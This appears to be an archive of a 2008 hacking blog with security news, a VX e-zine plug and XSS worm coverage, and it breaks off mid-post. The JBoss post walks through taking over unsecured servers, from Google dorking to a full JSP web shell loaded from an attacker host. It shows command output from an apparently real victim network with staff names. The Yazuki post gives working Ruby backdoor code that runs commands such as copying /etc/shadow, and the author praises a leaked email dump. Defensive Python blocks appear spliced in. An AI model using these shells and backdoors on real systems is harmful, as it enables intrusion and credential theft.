
root@server:~# dd if=/dev/hacking of=/dev/wired bs=1337k

29th - July - 2008 - 19:30

DNS exploits out in the wild


HDM and I)ruid of the Metasploit project have finally released exploits for the DNS vulnerabilities Dan Kaminsky talked about for quite a while without giving further details. The modules are only available in the development tree of Metasploit and are announced to work only on Linux platforms... Here is I)ruid's explanation of the vulnerability in modern DNS servers:

The first flaw is that since DNS (over UDP) is connectionless,
it can easily be spoofed. The original primary mitigation against
this was to make use of a 16-bit transaction ID which is used to
correlate requests and replies that the attacker would have to guess
in order to correctly spoof a reply packet. This makes spoofing harder,
but not an insurmountable task; you just need to be able to send a
whole lot of packets to eventually get one that matches the
transaction ID chosen for the request packet.

The second flaw was that additional records would be inserted into
the cache which were included in replies from another nameserver.
This is core protocol functionality, however the original problem
was somewhat mitigated by creating the in-bailiwick constraint that
essentially limits the domain space for additional records that could
be sent in the replies to hostnames from a given domain. Sounds
reasonable; this prevents nameservers from doing malicious things to
records in domains that they weren't queried for or aren't
authoritative for, while still allowing nameservers who are
authoritative for a domain to update the records they need to.

When you combine the attacks for these two flaws however, and introduce
nameserver query recursion, an attacker can essentially cause the target
nameserver to make as many queries as the attacker wants while also
pretending to be the authoritative nameserver and spoofing the
responses, achieving the birthday attack against the transaction ID
and successfully updating the nameserver record for a domain to point
to a malicious nameserver address. You can also use this trick to
inject cache entries for individual hostname records as long as those
hostnames are both not already cached, and also in-bailiwick.

The first attacks are running... It is time to patch!
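As an added illustration of the two flaws I)ruid describes (this is example code written for this page, not part of the Metasploit modules), the following Python sketches the resolver-side bailiwick check that decides which additional records may enter the cache, and the probability that a burst of forged replies hits one outstanding query's 16-bit transaction ID, with and without the roughly 16 extra bits that source-port randomization adds. The record tuples and zone names are constructed sample data.

```python
def normalize(name: str) -> str:
    """Canonicalize a DNS name: case-insensitive, no trailing dot."""
    return name.rstrip(".").lower()


def in_bailiwick(record_name: str, zone: str) -> bool:
    """True if record_name is the zone itself or a name below it.

    The comparison is done on label boundaries: 'notexample.com' must not
    pass for the zone 'example.com' just because it ends with that string.
    """
    record_name = normalize(record_name)
    zone = normalize(zone)
    if zone == "":          # the root zone covers every name
        return True
    return record_name == zone or record_name.endswith("." + zone)


def accept_additional_records(queried_zone, records):
    """Filter the additional section of a reply from queried_zone's nameserver.

    records is a list of (owner_name, rtype, rdata) tuples; only those whose
    owner name is in-bailiwick are allowed into the cache.
    """
    return [r for r in records if in_bailiwick(r[0], queried_zone)]


def spoof_success_probability(forged_replies: int, txid_bits: int = 16,
                              port_bits: int = 0) -> float:
    """Chance that at least one of forged_replies guesses matches one
    outstanding query whose identifier has txid_bits + port_bits of entropy.

    With the bare 16-bit transaction ID the identifier space is 2**16; source
    port randomization adds roughly another 16 bits (the 2008 mitigation).
    """
    space = 2 ** (txid_bits + port_bits)
    return 1.0 - (1.0 - 1.0 / space) ** forged_replies


# Constructed sample reply: the nameserver for example.com answers a query
# for www.example.com and tries to slip in records for other names.
SAMPLE_ADDITIONAL = [
    ("ns1.example.com", "A", "192.0.2.53"),
    ("www.example.net", "A", "203.0.113.7"),   # out of bailiwick: dropped
    ("notexample.com",  "A", "203.0.113.8"),   # suffix trap: dropped
]

if __name__ == "__main__":
    print(accept_additional_records("example.com", SAMPLE_ADDITIONAL))
    print(spoof_success_probability(65536))          # transaction ID only
    print(spoof_success_probability(65536, 16, 16))  # transaction ID + source port
```

With 65536 forged replies against a bare 16-bit ID the hit chance is about 63 percent; with source-port randomization the same effort yields roughly one chance in 65536, which is why the patch everyone was told to install is a port-randomization patch.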

29th - July - 2008 - 11:00

VX E-Zine released on EOF site


The group I founded back in 2006, known as EOF (Electrical Ordered Freedom), has now released an electronic E-Zine with a focus on virus writing. The E-Zine was made by the groups EOF and DoomRiderz; officially also RRLF, but they have not contributed anything and instead announced their end and brought out a "Best Of" E-Zine, which you can find on [their page]. Of course not only the members of EOF and DR have contributed, but also other people, some better known in the scene, some not...

In my personal opinion this E-Zine is very nice and a must-read for everyone interested in viruses. The authors have put their focus on the quality of the contributions and not the quantity, which does not make this E-Zine the biggest one ever, but a very interesting one to check out.

You can download the E-Zine from [EOF-Project.net]

23rd - July - 2008 - 18:30

Cold Boot Attacks, code available


The guys behind the theory of "Cold Boot Attacks on Encryption Keys" have now published the source code of the tools they developed to break systems like Mac OS X FileVault and Windows BitLocker. Their whole paper, called "Lest We Remember: Cold Boot Attacks on Encryption Keys", can be found [here]. Furthermore they have published all their tools on the following page:

[citp.princeton.edu/memory/code/], which includes the following tools:

Memory imaging
--------------

	USB / PXE Imaging Tools
	EFI Netboot Imaging Tools

Automatic key-finding
---------------------

	AESKeyFinder
	RSAKeyFinder

Error-correction for AES key schedules
--------------------------------------

	AESFix

If you are interested in more, then you should also check out the [media section] with images and videos showing and describing the whole process.

21st - July - 2008 - 17:30

F-Secure: Google Earth Demo


Those of you who check the F-Secure weblog from time to time will have heard of the Google Earth world map that F-Secure developed. The world map shows infections and malware worldwide and is browsable and clickable. Until now F-Secure had only released screenshots of their application, showing bot, worm or virus infections and furthermore spam and phishing scams worldwide. Now F-Secure has released their first video showing the Google Earth demo live on their YouTube group "fslabs". Check it out! It's very interesting and impressive.


The YouTube video can be found at [www.youtube.com/watch?v=UUwc71ySnLI].

21st - July - 2008 - 15:00

Jailbreak for iPhone 2.0


Yesterday the guys behind the "iPhone Dev Team" released their Pwnage 2.0 tool, which jailbreaks the iPod Touch, the iPhone and the iPhone 3G running firmware 2.0. Several hours ago an update of the tool was made public, fixing some bugs that had been reported. So the up-to-date version of Pwnage for iPhone is 2.0.1 at the moment.

With this "crack" it is easily possible to run third-party applications on the iPhone, which are developed as open source by the community. It is still not possible to break the SIM lock, but let's see if this will come in future versions.

I very much respect the work of the developers; they are doing a great job in reversing the iPhone and bringing out their tool for free to help the community. Even though I have no iPhone myself, I love the spirit that motivates those guys to do this!


For mirrors and downloads check out [blog.iphone-dev.org].

16th - July - 2008 - 11:00

RCE through Intel CPU bugs


At the upcoming Hack In The Box Security Conference 2008, from the 27th to the 30th of October in Malaysia, the well-known security researcher Kris Kaspersky wants to show a new technique to compromise computers remotely regardless of the operating system or software running on the system. Kris Kaspersky says he knows of 128 bugs in the Intel Core 2 and about 230 bugs in the Intel Itanium CPU. Many of those bugs can crash a system, locally and remotely, but some make it possible to execute arbitrary code on the machine and compromise it.

With a combined technique of JavaScript and TCP/IP storms he wants to show the audience how to get control of an Intel-based system quite easily. Using CPU bugs to attack a system is nothing totally new, but it hasn't been used widely so far. With this presentation Kris Kaspersky wants to show the dangers that users are exposed to from malicious people such as malware writers. A worm is one way of exploiting such issues and, shockingly enough, Intel has NO workarounds for the problems yet, which keeps users at risk.


To read the entire entry at the HITBSecConf2008 homepage, go [here].

15th - July - 2008 - 00:30

Rooting servers through JBoss


Some days ago I was surfing the internet and looked at the site of the security company n.runs, where I found a cool document called "Hacking JBoss using a Browser"; check it out [here]. I very much liked the document: it is well written and really works in real-world scenarios. At first I couldn't believe that people are really so naive as to forget securing the JMX Console of JBoss, so I tried searching Google and yep... it works!

Let's look at the steps we need to take to root (backdoor) a server using an unsecured JBoss default installation. First off we need to find a server. We know the following: JBoss is listening on port 8080, which makes it quite easy to find servers by searching for default strings on the main page, such as "JMX Console". This should be enough information for you to build a good Google string! When you click on the link JMX Console you will be redirected to http://host:8080/jmx-console/. There you have to search for a subsection called "jboss.deployment" and a link named "flavor=URL,type=DeploymentScanner". Click on it!

Now you are on a page with the following URL: http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL. Here you have to look for a subsection (function) called "void addURL()". Normally you will find TWO functions with this name; take the one with the "Param Type" "java.lang.String". If this function is not secured you can easily add WAR files to be deployed on the webserver, and THAT'S what we will do now!

The WAR file consists of two files; the first is called cmd.jsp and has the following content:

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    // run the submitted command and stream its standard output into the page
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>

It is quite uncomplicated: the JSP page just takes a command, executes it on the server and prints the output to the page. Now we create a file called web.xml in a subdirectory named WEB-INF:

<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
  http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
  version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/cmd.jsp</jsp-file>
  </servlet>
</web-app>

To finally create the resulting WAR file, type the following command on a console of your choice, with the Java utility jar installed: "jar cvf cmd.war WEB-INF cmd.jsp". Upload the file to your machine, for example http://attacker/cmd.war. Now include the file with the function "void addURL()". If all works fine you will see the following message: "Operation completed successfully without a return value.". It can take some seconds; then try to access the page http://host:8080/cmd/cmd.jsp and you should see your backdoor!

To check which user you are, type in whoami (works on Linux/Unix and Windows installations of JBoss). I tested it and you will find a lot of servers printing this:

Command: whoami

nt authority\system

Bingo! You are an administrator and have a backdoor running on the server with SYSTEM rights! You can do whatever you want now; some examples:

Command: ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . .: servweb1
   Primary Dns Suffix  . . . . .: mapdata.local
   Node Type . . . . . . . . . .: Unknown
   IP Routing Enabled. . . . . .: No
   WINS Proxy Enabled. . . . . .: No
   DNS Suffix Search List. . . .: mapdata.local

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 

   Description . . . . . . . . .: HP NC320i PCIe Gigabit Server Adapter
   Physical Address. . . . . . .: 00-18-71-77-7A-DD
   DHCP Enabled. . . . . . . . .: No
   IP Address. . . . . . . . . .: 10.0.0.56
   Subnet Mask . . . . . . . . .: 255.255.255.0
   IP Address. . . . . . . . . .: 11.0.0.8
   Subnet Mask . . . . . . . . .: 255.255.255.0
   Default Gateway . . . . . . .: 10.0.0.197
   DNS Servers . . . . . . . . .: *.*.*.*
                                  *.*.*.*
                                  *.*.*.*

(DNS Servers IP addresses replaced with asterisks)
Command: NET VIEW /DOMAIN

Domain

-----------------------------------
CLASSROOM            
MAPDATA              
SIDSA                
VENTAS               
The command completed successfully.
Command: NET VIEW

Server Name            Remark

-----------------------------------------------------------
\\ACOMERCIAL2          Blanca Lidia Bocanegra              
\\ADMIN1                                                   
\\ADMIN3                                                   
\\ADMINDIR             Direccion de Administracion ABaez   
\\ADMINRH              abigail                             
\\CAPACITACION1                                            
\\CAPACITACION2                                            
\\CARTOGRAFIA1         Cartografia1                        
\\CARTOGRAFIA10        Marisela - Jose Manuel              
\\CARTOGRAFIA11        Anuar                               
\\CARTOGRAFIA12                                            
\\CARTOGRAFIA14                                            
\\CARTOGRAFIA16                                            
\\CARTOGRAFIA2         NOE                                 
\\CARTOGRAFIA3         DELFIS-JHON                         
\\CARTOGRAFIA4         RICHAR - Rulas                      
\\CARTOGRAFIA5                                             
\\CARTOGRAFIA6         Delfis - Jhon                       
\\CARTOGRAFIA7                                             
\\CARTOGRAFIA8         Roman - Edgar                       
\\CARTOGRAFIA9         Raquel - Raul                       
\\CHECADOR                                                 
\\CND1                                                     
\\CND2                                                     
\\CONTA1                                                   
\\D-TECNOLOGIAS                                            
\\DESARROLLO                                               
\\DESARROLLO1                                              
\\DESARROLLO11                                             
\\DESARROLLO13                                             
\\DESARROLLO15                                             
\\DESARROLLO2                                              
\\DESARROLLO3                                              
\\DESARROLLO4                                              
\\DESARROLLO5          RAFA                                
\\DESARROLLO6                                              
\\DESARROLLO7                                              
\\DESARROLLO9                                              
\\DWEB1                George@dweb1                        
\\DWEB2                                                    
\\DWEB3                                                    
\\EPSILON                                                  
\\GDCD                 Gina                                
\\GPROYECTOS           Andres Ortiz                        
\\JMWONGPC             Pc de escritorio de Juan Manuel Wong
\\KAPPA                                                    
\\LAMBDA                                                   
\\LAP-PATRICIO                                             
\\LAP01-COMERCIAL      laptop dell acomercial 01           
\\LAP02-COMERCIAL      Laptod Dell Miguel Angel Zamudio    
\\PS-70D02E                                                
\\SAULIN               S@ulin                              
\\SERVAPPSVM                                               
\\SERVDCS1             Servidor Desarrollo                 
\\SERVMAS1                                                 
\\SERVMASDB                                                
\\SERVWEB1             Servidor Web                        
\\SIGMA                                                    
\\ZETA                                                     
The command completed successfully.

Have fun playing around... Happy Hacking! Hope you learned something new.


Information: Take care with your actions! When the server administrator runs netstat to check connections he/she will see a connection open to your webserver (because of the included WAR file). So to remove everything you should also use the function "void removeURL()" when you are finished.
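From the defender's side, the same sequence of requests leaves a clear trail in the HTTP access log. The following Python is an added example (not part of the n.runs paper or of JBoss) that scans constructed Tomcat/JBoss access-log lines for the steps described above: the JMX console being reached from outside an assumed administrator network, the DeploymentScanner MBean being inspected, an operation being invoked through HtmlAdaptor, and a JSP afterwards being called with a cmd= parameter. The ADMIN_NETS range and the log lines are assumptions made for the example.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines (not from a real server) in the common access-log
# format Tomcat's AccessLogValve writes when it is enabled in JBoss.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [15/Jul/2008:00:12:01 +0200] "GET /jmx-console/ HTTP/1.1" 200 9123
10.0.0.5 - - [15/Jul/2008:00:12:15 +0200] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL HTTP/1.1" 200 4521
10.0.0.5 - - [15/Jul/2008:00:12:40 +0200] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 612
10.0.0.5 - - [15/Jul/2008:00:12:55 +0200] "GET /cmd/cmd.jsp?cmd=whoami HTTP/1.1" 200 88
192.168.1.20 - - [15/Jul/2008:00:13:02 +0200] "GET /index.html HTTP/1.1" 200 1200
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Assumption: administrators only ever reach the console from this network.
ADMIN_NETS = [ip_network("192.168.1.0/24")]


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    url = urlsplit(entry["target"])
    entry["path"] = url.path
    entry["query"] = parse_qs(url.query)
    return entry


def classify(entry):
    """Return the list of reasons this request looks like JMX console abuse."""
    reasons = []
    path = entry["path"].lower()
    if path.startswith("/jmx-console"):
        client = ip_address(entry["client"])
        if not any(client in net for net in ADMIN_NETS):
            reasons.append("jmx-console reached from a non-admin address")
        mbean = ",".join(entry["query"].get("name", []))
        if "deploymentscanner" in mbean.lower():
            reasons.append("DeploymentScanner MBean inspected (addURL/removeURL live here)")
        if entry["method"] == "POST" and path.endswith("/htmladaptor"):
            reasons.append("MBean operation invoked through HtmlAdaptor")
    if path.endswith(".jsp") and "cmd" in entry["query"]:
        reasons.append("JSP called with a cmd= parameter (web-shell pattern)")
    return reasons


def scan_access_log(text):
    """Return (client, method, path, reason) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for reason in classify(entry):
            findings.append((entry["client"], entry["method"], entry["path"], reason))
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(finding)
```

The POST that actually carries the addURL argument is not visible in the access log (the WAR URL travels in the request body), so the detection keys on the surrounding steps instead; restricting /jmx-console to an admin network and requiring authentication on it removes the whole sequence.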

13th - July - 2008 - 22:00

Azet.sk - Thousands of emails leeched


And once again a big community website has been hit by a security bug. This time the victim was the Slovakian website Azet.sk. The site includes a dating platform, which was vulnerable to parameter manipulation that made it possible for an attacker to get users' email addresses. With a PoC script coded and released on a Slovakian security site, attackers were able to extract more than 200.000 valid email addresses. Nice shot!

What is really shocking about this whole case is the way the vendor reacted: "It is not a bug, it is a feature!"... Okay! That's one way to explain that you really did something heavily wrong while developing and securing your website. Just imagine other sites like MySpace had such great "features" too: up to 100 million emails would become public. But luckily not every security expert thinks of bugs as features.

Some (quite illogical) statements from the vendor:

No emails leaked from the website Zoznamka.azet.sk, as is stated
in articles on blog.synopsi.com and pocitace.sme.sk, only email
contacts.
---
(whatever the difference might be ...)
Processing of email addresses was developed and programmed in
such way.
---
(great development!)
Described way how to extract email addresses from HTML code is
commonly used by the spammers in the world, they get addresses
and misuse them. So this is not directly a security issue of
the Zoznamka.azet.sk website.
---
(uhm, yeah... and because of the spammers you should care about this!)

And so on... It seems the vendor has no real idea of security at all!


Check out the email dump [here].

Original news at [Zone-H].

09th - July - 2008 - 23:30

Computer Bild talks about VX


My friend Michael Cichosz informed me some days ago that there is a short article about the VX scene in the newest issue of the German computer magazine "Computer Bild". To be honest, this isn't the best magazine around and it is meant for people with normal or low computer knowledge, but never mind... The article is as expected: many lines about the evil "Hackers" that are destroying everything, about script kiddies that turn into evil hackers and put you at risk, and so on and so on. The usual media stuff. One thing Michael pointed my attention to made me smile: they actually indirectly cited my article about the VX scene in the Hakin9 magazine, read here:

Wer steckt hinter den Virii-Seiten?

Einerseits sind es Idealisten, die auf die Sicherheitslücken
von PC-Systemen hinweisen wollen. So wenigstens liest es sich
auf den Eingangsseiten der Virii-Angebote. Einige betrachten
sich als "Künstler", die nach Herausforderungen suchen.
Es gelte, neue Techniken zu erlernen, schreibt etwa das aus Polen
veröffentlichte Magazin Hakin9.

This translates to something like:

Who is behind those Virii-Sites?

On the one hand there are idealists, that want to point the attention
to security vulnerabilities in computer systems. At least this is the
way it is written on most of the start pages of Virii-Sites. Some define
themselves as "artists", that search for new challenges. It is about
finding new techniques, that's what the Polish magazine Hakin9 writes.

Thanks... Funny to have seen this!


The text this was all about: [VX - The Virus Underground].

09th - July - 2008 - 20:30

ZoneAlarm blocks internet


Some minutes ago I was on the phone with my best friend, who now has a flat rate for calls in the German landline network. He talked about a new virus that he had seen on a PC of a friend of his, which had not been detected by AntiVir, but then he mentioned something interesting and told me the following: "You know what is really strange? Since the automatic Microsoft update I can't reach the internet anymore. My firewall ZoneAlarm is blocking all the traffic. I have to kill the firewall to surf, which is kind of unsafe!" I wondered a bit and was not sure if it was a problem only he had or if it might be something common. So I checked the news at Heise.de/Security and found an article titled "ZoneAlarm bockt nach Microsofts DNS-Patch" ("ZoneAlarm balks after Microsoft's DNS patch"), which perfectly describes his problem.

Until now there is still no official patch for Check Point's firewall product, but because of the massive number of messages sent to their support, they suggest users first uninstall the Microsoft patch KB951748. I called my friend again and told him to visit Heise and check if this solves his problem. I hope it will, and hopefully ZoneAlarm brings out a patch soon.


Original news at Heise.de/Security can be found [here].

08th - July - 2008 - 20:00

Justin.tv hit by XSS Worm


Another XSS worm has come to life. This time the video and chat community [justin.tv] has been hit by an XSS worm that was, once again, non-malicious and only a proof of concept. The worm was coded and released by the authors of the website [www.thedefaced.org]. The original news I read can be found on [xssed.com]. x2Fusion from TheDefaced stated the following about the worm:

This actually is the very first XSS worm which we have unleashed,
and it was solely upon research reasons; non-malicious at all :)

We've contacted the JTV Programmers prior to the fixing of the XSS worm
and have sorted things out with them and made sure that they knew NO
information such as IP Address, Cookies, Sessions and further
information which poses private is not to be released. After that
I put myself forward and found another XSS in turn to prove that
I was dedicated to helping JTV out in any further possible
vulnerabilities.

The worm was made possible by bad (actually, no) sanitization of the "Location" field in the user profile. It was possible to inject arbitrary HTML and script, and the authors used the following to inject the worm's code:

<iframe id='tframeid' width=0 height=0 frameborder=0></iframe>
<script src="justinworm.js" language="javascript"></script>"

The authors of xssed.com have made a graphic (PNG) showing the development of the worm in the network of justin.tv, look [here].

The worm's source code can be found on [worms.xssing.com/sources/justintv.txt]. It is open to everyone because the authors coded it for educational purposes only. Furthermore the vulnerability is fixed; to be precise, it was fixed on Sun, 29 Jun 2008 21:12:21 GMT.

What to say? Well, once again an XSS worm has come to light, compromising 2525 profiles in total, and again it was NOT malicious! XSS worms are still very young on the web and there are about one dozen around, all publicly available to learn from, BUT, and this is the problem: I guess it won't take very long until the first malicious people come into the game and use the knowledge the good guys also have to do "bad" stuff. The potential is immense. Just imagine a malicious XSS worm that manipulates a user's profile and embeds a manipulated SWF file into it, which automatically tries to attack the user's browser to execute arbitrary commands on the victim's machine and install malware, for botnets, for spam, for whatever might be interesting. The time will come; if website administrators don't learn it NOW they will soon learn it the hard way. There is still time to learn it the soft way, with the help of people like x2Fusion, who do ethical hacking, but it won't stay like this forever!
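The fix for the "Location" field is output encoding at render time, with input validation as a second layer. The Python below is an added example (not justin.tv's code) that renders the exact injection string quoted above through a vulnerable template and through one that HTML-escapes the value, lists which tags each rendering contains, and checks the value against an assumed allow-list for place names.

```python
import html
import re

# The exact string the post says was placed in the "Location" profile field.
WORM_INJECTION = (
    "<iframe id='tframeid' width=0 height=0 frameborder=0></iframe>"
    '<script src="justinworm.js" language="javascript"></script>"'
)

TAG_RE = re.compile(r"<\s*(/?[A-Za-z][A-Za-z0-9]*)")
# Assumption: a place name needs only letters, digits, spaces and a little punctuation.
LOCATION_RE = re.compile(r"^[A-Za-z0-9 ,.'\-]{1,64}$")


def render_location_vulnerable(location):
    """What a template does when it trusts the stored value: raw interpolation."""
    return f'<div class="location">{location}</div>'


def render_location_fixed(location):
    """Output encoding: every < > & " ' becomes an entity, so no tag can form."""
    return f'<div class="location">{html.escape(location, quote=True)}</div>'


def valid_location(location):
    """Input validation as a second layer: reject anything that is not a place name."""
    return LOCATION_RE.match(location) is not None


def tag_names(page):
    """List the tag names present in a rendered fragment, in order."""
    return [m.group(1).lower() for m in TAG_RE.finditer(page)]


if __name__ == "__main__":
    print(tag_names(render_location_vulnerable(WORM_INJECTION)))
    print(tag_names(render_location_fixed(WORM_INJECTION)))
    print(valid_location("Berlin, Germany"), valid_location(WORM_INJECTION))
```

Escaping on output is the part that actually stops the worm; the allow-list only narrows what gets stored and would not protect other fields that the template still renders raw.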

08th - July - 2008 - 08:00

Wired-Security readers know first

Reading my emails this morning I also received one from a friend of mine (Marko Rogge), which pointed me to a Heisec news entry. The news entry can be found [here] and is titled "MSN-Phishing und Link-Spam greift um sich", which translates to something like "MSN phishing and link spam is spreading". This entry was made on the 7th of July, or in other words: yesterday. Readers of Wired-Security have known about this problem for a month; check the archive for the [news].

Furthermore the Heise news entry is not very informative; it does not say a lot about the whole problem, nothing about the website, the hoster etc. And one specific point is missing: the problem is not only a problem of MSN, the phishers' website also includes a login field for ICQ. All of that is missing in Heise's entry.

What shall I say? I am quite angry about this news because I informed Heise in an email ONE MONTH ago, and I can prove this, and they totally ignored my email and NOW, after one month, they write about it as if THEY found this out. This is not only unprofessional, it kept users at risk and uninformed for over 30 days!

To prove I am not lying, here is the source of my email sent to them:

MIME-Version: 1.0
Date: Wed, 4 Jun 2008 22:31:25 +0200
From: <skyout@wired-security.net>
To: red@heisec.de
Subject: MSN/ICQ Phishing
Message-ID: <61a07e03c1e1286dd80dd97b20947d7e@s2.nexpaserver.de>
X-Sender: skyout@wired-security.net
User-Agent: RoundCube Webmail
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit

http://wired-security.net/archive/2008/june/index.php#04_2_062008

Please look closer at this and maybe blog about it. If you do so,
please be so fair to link back to my blog. Thanks. SkyOut.

Look at the date: 4th of JUNE! So instead of being fair enough to blog about it and link back to my blog, they ignored it and make their users believe they found something new, one month after my readers knew about it... This is unprofessional and awkward!

Conclusion: Next time I won't inform Heise anymore. Let them be uninformed if they can not even credit those, who informed them.

06th - July - 2008 - 04:30

Apache error_log Backdoors (DE)


It's been quite a while since I posted my last Hakin9 article here, but now it is time for a new article. I planned to release it much earlier, so sorry for the delay. The article is called "Apache error_log Backdoors" and has been released in Hakin9 2/2008 (March).

The theory of the article is the following: every time a user connects to an Apache webserver and tries to access a page that is not there, information about this access gets written to Apache's error_log file, which is normally stored in /var/www/logs/error_log. We will use this feature to receive shell commands, which then get executed. I have coded a proof-of-concept called Yazuki in Ruby that demonstrates a simple backdoor; look here:

#!/usr/bin/env ruby

# Name: Yazuki
# Author: SkyOut
# Date: October 2007
# Website: http://wired-security.net/

# Used Ruby Version: 1.8.4
# Tested on: OpenBSD 4.1

# This Proof-of-Concept code shows a simple backdoor
# concept, that does not need any open port to execute
# shell commands. Yazuki will search the error_log file
# of Apache every 5 seconds for a specified password and
# executes the given command, that can have up to five
# arguments (for more, edit the "command =" assignment below).

# Possible commands: (Make sure to always have five arguments
# or edit the "command =" assignment below)
# less /etc/passwd > /var/www/htdocs/pw.txt ;
# ls -a /home > /var/www/htdocs/home.txt

# Define the error_log file of Apache
error_log = "/var/www/logs/error_log"

# Start an indefinite loop
loop do
  # Open Apache's error_log file
  if File.file?(error_log) && File.readable?(error_log)
    File.foreach(error_log) do |line|
      # Look for the password
      next unless line =~ /password/
      # Make an array of the error_log line
      array = line.split(" ")
      # Take the 5 arguments following the password (fields 13 to 17
      # of an Apache 1.3/2.0 "File does not exist" line)
      command = array.fetch(13) + " " + array.fetch(14) + " " +
                array.fetch(15) + " " + array.fetch(16) + " " +
                array.fetch(17)
      # Execute the command and wait for it to finish
      IO.popen(command) { |io| io.read }
      # Truncate the error_log file again
      File.truncate(error_log, 0) if File.writable?(error_log)
    end
  end

  # Wait 5 seconds
  sleep 5
end

How does this code work? Well, it is very simple. We define a password (for example "password"; you should choose something better, of course) and then we connect to the server like this:

GET /password [our shell commands go here] HTTP/1.1
Host: www.example.com
[newline]
[newline]

So, let's say we have installed our backdoor as root, then we could for example send the following command to the webserver:

GET /password cat /etc/shadow > /var/www/htdocs/shadow ; HTTP/1.1
Host: www.example.com
[newline]
[newline]

Now of course this file won't exist, so Apache will log an error in error_log. That file is searched by our backdoor every 5 seconds, and if our program finds a line containing our specified password it takes the 5 tokens after it, puts them together and sends them to the underlying command shell. In the code these are the following lines:

if line =~ /password/

array = line.split(" ");

command = array.fetch(13) + " " + \
array.fetch(14) + " " + array.fetch(15) \
+ " " + array.fetch(16) + " " + array.fetch(17)

IO.popen("#{command}")

After that the file gets truncated again, and we can now read the shadow file by connecting to the webserver as follows:

GET /shadow HTTP/1.1
Host: www.example.com
[newline]
[newline]

The whole article printed in Hakin9 can be found [here] (Texts -> Attack).

The Proof-of-Concept code can be found [here] (Releases -> Hacking/Cracking).
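The other side of this technique is spotting it in the very log the backdoor reads from. The Python below is an added example (not Yazuki and not from the Hakin9 article) that parses constructed Apache 1.3/2.0 error_log lines, flags "File does not exist" entries whose requested path carries extra tokens, shell metacharacters or known command names, and reassembles the five fields 13 to 17 that Yazuki would have executed, which is what an incident responder wants from such a line. The command-name list and the sample lines are assumptions.

```python
import re

# Constructed sample lines (not from a real server) in the Apache 1.3/2.0
# error_log format that Yazuki's field indices 13..17 assume.
SAMPLE_ERROR_LOG = """\
[Sun Jul 06 03:30:01 2008] [error] [client 10.0.0.7] File does not exist: /var/www/htdocs/favicon.ico
[Sun Jul 06 03:30:05 2008] [error] [client 10.0.0.7] File does not exist: /var/www/htdocs/password cat /etc/shadow > /var/www/htdocs/shadow ;
[Sun Jul 06 03:31:12 2008] [notice] Apache/1.3.29 (Unix) configured -- resuming normal operations
[Sun Jul 06 03:32:00 2008] [error] [client 10.0.0.9] File does not exist: /var/www/htdocs/old page.html
"""

ERROR_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] (?:\[client (?P<client>[^\]]+)\] )?(?P<msg>.*)$'
)

SHELL_META = set(";|&><`$()")
# Assumption: a short list of program names that have no business in a URL path.
COMMAND_WORDS = {"cat", "less", "ls", "sh", "bash", "wget", "curl", "nc", "perl", "chmod", "rm"}


def parse_error_line(line):
    """Split an error_log line into timestamp, level, client and message."""
    m = ERROR_RE.match(line)
    return m.groupdict() if m else None


def missing_file_path(entry):
    """Return the requested path from a 'File does not exist:' message, else None."""
    prefix = "File does not exist: "
    msg = entry["msg"]
    return msg[len(prefix):] if msg.startswith(prefix) else None


def path_indicators(path):
    """Reasons a requested path looks like an embedded shell command."""
    reasons = []
    tokens = path.split()
    if len(tokens) > 1:
        reasons.append("whitespace in path (extra tokens after the file name)")
    if any(ch in SHELL_META for ch in path):
        reasons.append("shell metacharacters in path")
    if any(tok.lower() in COMMAND_WORDS for tok in tokens[1:]):
        reasons.append("known command name after the path")
    return reasons


def yazuki_command(line):
    """Reassemble the five tokens Yazuki would execute from this line, or None."""
    tokens = line.split()
    if len(tokens) < 18:
        return None
    return " ".join(tokens[13:18])


def scan_error_log(text):
    """Return (client, path, reasons) for lines with at least two indicators.

    A single indicator (one space in a file name, say) is too common to alert on.
    """
    findings = []
    for line in text.splitlines():
        entry = parse_error_line(line)
        if entry is None:
            continue
        path = missing_file_path(entry)
        if path is None:
            continue
        reasons = path_indicators(path)
        if len(reasons) >= 2:
            findings.append((entry["client"], path, reasons))
    return findings


if __name__ == "__main__":
    for client, path, reasons in scan_error_log(SAMPLE_ERROR_LOG):
        print(client, path, reasons)
```

A host-based check that pairs with this is watching for error_log being truncated to zero bytes outside log rotation, since Yazuki does exactly that after every command.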

06th - July - 2008 - 03:30

HTTP GET Request in C (Win32)

I am currently developing a program that uses a GET request to fetch data from a website. The first basic steps are done, thanks to the help of WildCat. If you want to look at the first steps, here we go. The headers and globals:

